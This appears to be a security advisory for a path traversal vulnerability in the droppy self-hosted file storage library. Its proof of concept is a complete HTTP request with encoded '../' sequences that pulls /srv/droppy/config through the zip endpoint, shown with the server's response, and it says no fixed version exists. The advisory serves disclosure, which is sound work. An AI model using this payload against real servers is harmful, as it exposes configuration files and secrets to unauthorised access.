Path Traversal
droppy is a library for self-hosted file storage.
Affected versions of this package are vulnerable to Path Traversal. It is possible to traverse directories to fetch configuration files from a droopy server.
PoC
GET /!/zip/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%73%72%76%2f%64%72%6f%70%70%79%2f%63%6f%6e%66%69%67 HTTP/1.1
Host: 192.168.0.11:8989
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: s=XtlnyU3If2YoVi8jiExHS++NwzrMpQMbmS0l/usCPJcH2J8S
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Disposition: attachment; filename="config.zip"
Cache-Control: private, max-age=0
ETag: "4a-akoxq55ZKs8DpqVaiOcP6h8oCoI"
Date: Sun, 25 Oct 2020 18:27:10 GMT
Connection: close
Content-Length: 847
Backend Request: /!/zip/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../srv/droppy/config
How to fix Path Traversal? There is no fixed version for droppy.
| |
